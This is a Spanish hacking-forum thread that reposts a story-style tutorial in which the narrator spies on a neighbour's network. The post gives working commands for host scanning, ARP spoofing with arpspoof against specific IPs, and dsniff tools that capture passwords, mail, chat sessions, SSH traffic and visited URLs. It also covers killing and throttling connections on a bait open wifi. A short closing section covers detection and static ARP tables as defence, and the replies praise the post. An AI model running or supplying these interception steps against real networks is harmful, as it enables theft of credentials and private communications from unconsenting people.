comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Nos acercamos a la vecina con dsniff

  • 3 Respuestas
  • 5026 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5411
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Julio 30, 2014, 09:33:46 am »

Mientras ella vigilaba yo había boteado mi lápiz, esta vez com BackTrack (http://www.remote-exploit.org/cgi-bin/fileget?versión=bt3-usb) las herramientas que necesitaba eran, digamos que más informales y aunque todas están en esta formidable distro (https://wiki.remote-exploit.org/backtrack/wiki/Alphabetical) en este capítulo se actuará como si se instalaran en el HD. Primero, qué menos que conocer la ip de mi improvisado equipo :

Código: Bash
  1. ifconfig

Y ver las máquinas que hay en la red en la que me encuentro:

Código: Bash
  1. nmap -sP 192.168.1.0/24

Bajo e instalo arp-sk-0.0.16.tgz (http://sid.rstack.org/arp-sk/) junto con libnet1 y el paquete que nos va a permitir husmear por la red para intentar descubrir datos del paradero de mi vecina.

Código: Bash
  1. apt-get install dsniff

Activo forwarding para que los paquetes vayan a sus verdaderos destinatarios:

Código: Bash
  1. echo 1 > /proc/sys/net/ipv4/ip_forward

Y lanzo arpspoof para redirigir los paquetes del router a la máquina atacada y viceversa:

Código: Bash
  1. arpspoof -i eth0 -t 192.168.1.1 192.168.1.135 2> /dev/null &
  2. arpspoof -i eth0 -t 192.168.1.135 192.168.1.1 2> /dev/null &

Para ver las todas posibilidades de jugar, integrados en esta aplicación:

Código: Bash
  1. dpkg -L dsniff | grep bin

Empiezo a abrir consolas, las esparzo por la pantalla, me rooteo en todas y en cada una lanzo un proceso. Para snifar contraseñas (si hay suerte, que no siempre ocurre):

Código: Bash
  1. dsniff -m -i eth0

Si la red es inalámbrica sustituir “eth0″ por “wlan0″. Con -m se intenta determinar el protocolo automáticamente a partir del archivo /usr/share/dsniff/dsniff.magic. No lanzo “macof” porque no tengo la intención de dejarla red inservible pero sí para capturar tráfico nfs, correo (Outlook, Thunderbird..) y sesiones de chat (Messenger, Yahoo, …):

Código: Bash
  1. filesnarf -i eth0
  2. mailsnarf -i eth0
  3. msgsnarf -i eth0

Para analizar el tráfico ssh (Aunque, a veces, las contraseñas siendo correctas se detecten como “Password authentication failed”)

Código: Bash
  1. sshow -i eth0

Ver todas las páginas que visita el husmeado:

Código: Bash
  1. urlsnarf -i eth0

- Oye, ¿sabes que los famosos protocolos de cifrado de contraseñas wifi, las famosas WPE y WPA, se craquean en menos que canta un gallo?

- Y, ¿Qué?

- Pues que las noches en las que no tengo nada que hacer voy de pesca…

- ¿De pesca?

- Dejo la wifi abierta (sin contraseña) y espero que alguien pique. Luego con dsniff me divierto un buen rato hasta que el piratilla se asquea…

- Mira que eres malo

- Con # tcpkill -i eth0 host nombre_del_host.com le mato conexiones, con # tcpnice -A -i eth0 tcp se las ralentizo y con # webspy -i eth0 IP y en la barra del navegador pongo la IP del intruso veo por donde navega… Oye, es divertidísimo que te chupen wifi….

- Vaya pedazo de kcron estás hecho….

Analizando todos los datos que arrojaba cada una de las terminales pudimos averiguar un montón de cosas importantes. Desconectamos el equipo y lo volvimos a dejar todo como estaba. Salimos de nuestro escondite y nos dirigimos a las dependencias 98 Milenium, en la quinta planta. Los pasillos estaban muy concurridos. Unos guardias de seguridad pasaron por nuestro lado y, por lo que comentaban, había algún intruso en la 7 planta. Sin duda nos buscaban a nosotros. El administrador dela red , que se le supone “estar al tajo”, seguro que había detectado MACs duplicadas, síntoma de que alguien está fisgoneando donde no debe, con:

Código: Bash
  1. arp -a

Yo, en mi pc antes de que me lo destrozaran, para evitar el envenenamiento ARP había creado tablas ARP estáticas:

Código: Bash
  1. arp -s 192.168.2.2 00:35:4c:31:1A:12

O para hacerlo permanente:

Código: Bash
  1. touch /etc/arp.conf
  2. nano /etc/arp.conf

Y en su interior poner la MAC (o MACs) del equipo y separado por un espacio la IP del/los pcs:

00:35:4c:31:1A:12 192.168.2.2

Se edita:

Código: Bash
  1. nano /etc/network/interfaces

Y en la última línea se pone:

Código: Bash
  1. post-up /usr/sbin/arp -f /etc/arp.conf

En cuestiones de seguridad nada es infalible, pero siempre puedes tocarles los bzips a los curiosos. Mientras pasábamos por un pasillo flanqueado por grandes vidrieras que daban a estancias repletas de oficinistas, volvimos a ver a .(punto)Antúnez. Nos mimetizamos con los que estaban esperando su turno alrededor de una máquina de café sin quitarle ojo de encima. Al rato salió, acompañado de otra persona con la que mantenía una animada charla. Entraron en el ascensor y descendieron hasta la planta -2. Hacia allí nos dirigimos. Por aquella planta no se veía un alma. Decidimos entrar por una puerta al azar.



- ¡Alto! a qué departamento están adscritos…

Nos asaltaron al abrir la puerta…

- .dll

- Esto está en la 3ª planta

- Perdón…

Cerramos.

- ¿Te has fijado?

- ¿Me engañó la vista o todos estaban atados a las sillas delante del monitor?

- Viste bien… y les torturaban con el “tour de güindous”… sssssshhhh …..se oyen pasos… ¡entremos aquí!

Nos metimos en los servicios

- Precisamente buscaba unos…..

….

- Ella tan tranquila haciendo sus necesidades…

- ¡Pues no!… me permites coger un poco de papel…

Fuente: tuxapuntes
« Última modificación: Julio 30, 2014, 09:35:52 am por ANTRAX »


Desconectado Stiuvert

  • *
  • Colaborador
  • *
  • Mensajes: 2668
  • Actividad:
    0%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #1 en: Julio 30, 2014, 10:23:44 am »
Muy completo ANTRAX!

Se ve muy interesante este método, siempre hay que tener cuidado con las WiFis abiertas, pueden ser anzuelos.


Un saludo

Enviado desde mi Smartphone

Desconectado WhiZ

  • *
  • Underc0der
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Julio 30, 2014, 10:40:53 am »
Jeje muy bueno.

Me gustó la idea de enseñar con una historia.

Saludos!
WhiZ


Desconectado Cl0udswX

  • *
  • Colaborador
  • *
  • Mensajes: 870
  • Actividad:
    1.67%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #3 en: Agosto 08, 2014, 09:58:06 pm »
HoneyPot para los incautos y aprovechados...

Muy buena información ANTRAX!!!

Gracias!!!
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


 

¿Te gustó el post? COMPARTILO!